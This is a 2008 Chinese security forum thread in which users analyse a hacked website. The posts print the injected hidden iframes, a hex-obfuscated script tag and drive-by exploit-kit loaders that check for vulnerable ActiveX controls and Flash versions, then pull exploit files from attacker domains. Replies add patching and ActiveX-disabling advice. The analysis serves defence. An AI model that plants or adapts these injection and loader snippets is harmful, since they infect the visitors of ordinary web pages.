引用:

原帖由 xiaotuzi 于 2008-10-18 15:56 发表
没有报警的机子都中了吧！嘎嘎嘎~~~~~ (:yc69)

没发现中招

复制内容到剪贴板

代码:

<iframe src=http://www.pdh001.cn/b3.htm width=50 height=0 border=0></iframe>
<iframe src=http://www.wyf005.cn/b3.htm width=50 height=0 border=0></iframe>
<iframe src=http://www.union501.cn/b3.htm width=50 height=0 border=0></iframe>
<iframe src=http://www.union501.cn/b3.htm width=50 height=0 border=0></iframe>
<iframe src=http://www.eqw009.cn/b3.htm width=50 height=0 border=0></iframe>
<iframe src=http://www.eqw009.cn/b3.htm width=50 height=0 border=0></iframe>
<iframe src=http://www.eqw009.cn/b3.htm width=50 height=0 border=0></iframe>
<iframe src=http://www.wrmfwd.cn/b3.htm width=50 height=0 border=0></iframe>
<iframe src=http://www.wrmfwi.cn/b3.htm width=50 height=0 border=0></iframe>
<script src=http://%75%69%6E%32%2E%63%6E></script>
<script src=http://%75%69%6E%32%2E%63%6E></script>
<script src=http://%75%69%6E%32%2E%63%6E></script>

确实是被挂马了

第一个挂马网页已失效。

引用:

未找到服务器

Firefox  无法在 www.pdh001.cn 找到该服务器。

第二个挂马网页，居然还加了统计代码，难道是统计多少人中招？

复制内容到剪贴板

代码:

<br>
<br>
<Iframe src="http://zlwrnm8.cn/a1/fxx.htm" width=100 height=0></Iframe>
<br>
<br>
<br>
<br>


<Script language="javascript" type="text/javascript" src="http://js.users.51.la/1936348.js"></script>

再向里边一层：

复制内容到剪贴板

代码:

<script>
document.write("<iframe width=100 height=0 src=fx.htm></iframe>");
document.write("<iframe width=100 height=0 src=ss.html></iframe>");
window.status="&#205;ê&#179;&#201;";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=100 height=0 src=Ms06014.htm></iframe>");
try{var m;
var hw=new ActiveXObject("Downloader.DLoader.1");}
catch(m){};                     
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=http://zlwrnm8.cn/sina.htm></iframe>");}}
try{var n;
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0 src=http://zlwrnm8.cn/UU.htm></iframe>");}}
try{var b;
var ml=new ActiveXObject("DPClient.Vod");}
catch(b){};                     
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=Thunder.html></iframe>");}}
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};                     
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=GLWORLD.html></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32")
document.write("<iframe width=100 height=0 src=real.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=Real.html></iframe>");
}
test();
document.write("");
</script>

嗯，关键的代码就在这里了～

第三个，好像和第二个一样……

复制内容到剪贴板

代码:

<br>
<br>
<Iframe src="http://zlwrnm8.cn/a1/fxx.htm" width=100 height=0></Iframe>
<br>
<br>
<br>
<br>


<Script language="javascript" type="text/javascript" src="http://js.users.51.la/1936348.js"></script>

看了一下后边的几个iframe，和第二个都是完全相同的了，不再继续分析，开始看<script>……

[ 本帖最后由 SONGBOWEN 于 2008-10-18 22:25 编辑 ]

<script>采用了Hex加密，解密后得到：

复制内容到剪贴板

代码:

<script src=http://uin2.cn></script>

打开看代码：

复制内容到剪贴板

代码:

function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<Iframe src=http://zlwrnm8.cn/a1/ilink.html width=100 height=0></Iframe>");
}
else{document.write("<Iframe src=http://zlwrnm8.cn/a1/flink.html width=100 height=0></Iframe>");}
}
document.writeln("<Iframe src=http:\/\/www.hryspaq.cn\/b2.htm width=50 height=0><\/iframe>")

http://zlwrnm8.cn/a1/ilink.html的内容：

复制内容到剪贴板

代码:

<Script src="swfobject.js" type="text/javascript"></Script>  
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
        document.getElementById('flashversion').innerHTML="";
        if(version['rev']==115){
                var fuckavp = "DZ";
                var fuckaxp = "aa";
                var fuckaqp = "c";
                var so=new SWFObject("./i11"+"5.swf","mymovie","0.1","0.1","9","#000000");
                so.write("flashcontent")
        }else if(version['rev']==45){
                var fuckavpxa = "P";
                var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");
                so.write("flashcontent")
        }else if(version['rev']==16){
                var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");
                so.write("flashcontent")}else if(version['rev']==64){var hgds = "DZ";
                so=new SWFObject("\x2e\x2f\x69\x36\x34\x2e\x73\x77\x66","\x6d\x79\x6d\x6f\x76\x69\x65","\x30\x2e\x31","\x30\x2e\x31","\x39","\x23\x30\x30\x30\x30\x30\x30");
                so.write("flashcontent")
        }else if(version['rev']==28){
                var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");
                so.write("flashcontent")
        }else if(version['rev']==47){
                var fuckavpx = "DZ";
                var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");
                so.write("flashcontent")
        }else if(version['rev']>=124){
                if(document.getElementById){
                        var fisx="gf";
                        document.getElementById('flashversion').innerHTML=""
                }
        }
}
var kdcxma="ogf";
</ScripT>  

貌似是一个Flash溢出漏洞……

再打开http://zlwrnm8.cn/a1/flink.html看看：

复制内容到剪贴板

代码:

<Script src="swfobject.js" type="text/javascript"></Script>  
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
        document.getElementById('flashversion').innerHTML="";
        if(version['rev']==115){
                var fuckavp = "SB";
                var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");
                so.write("flashcontent")
        }else if(version['rev']==64){
                var fuckavp = "SB";
                var fucaxavp = "SB";
                var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");
                so.write("flashcontent")
        }else if(version['rev']==47){
                var snjd="dsa";
                var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");
                so.write("flashcontent")}else if(version['rev']==45){
                var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");
                so.write("flashcontent")
        }else if(version['rev']==28){
                var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");
                so.write("flashcontent")
        }else if(version['rev']==16){
                var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");
                so.write("flashcontent")
        }else if(version['rev']>=124){
                if(document.getElementById){
                        document.getElementById('flashversion').innerHTML=""
                }
        }
}
</script>

和刚才那个差不多，估计也是一个Flash溢出漏洞。

再来看最后一个——http://www.hryspaq.cn/b2.htm：

复制内容到剪贴板

代码:


<Iframe src="http://zlwrnm8.cn/a1/fxx.htm" width=100 height=0></Iframe>
<br>
<br>
<br>
<br>


<Script language="javascript" type="text/javascript" src="http://js.users.51.la/1936348.js"></script>

好像又回到第一个那里去了……汗

[ 本帖最后由 SONGBOWEN 于 2008-10-18 22:32 编辑 ]

小宋好厉害，崇拜，那有危险吗？我也看不懂这些代码……

系统中没有存在漏洞的软件，就没有危险（FlashPlayer、Sina iGame、Thunder、UUSea等）
或者，禁用ActiveX插件，或者使用不支持ActiveX插件的浏览器，都是安全的。

小宋，很强呀

2008-10-18 09:27
Legend 超级版主 超级版主 积分 43423 发帖 43388 注册 2005-10-30

经过分析，微点可以很好的对此带毒网站报警！

附件 1: 1.PNG (2008-10-18 10:05, 61.14 K)

已经不用怕了~！~！

为什么我用蜘蛛和卡巴2009都没报木马哦

难道我中了,什么症状啊?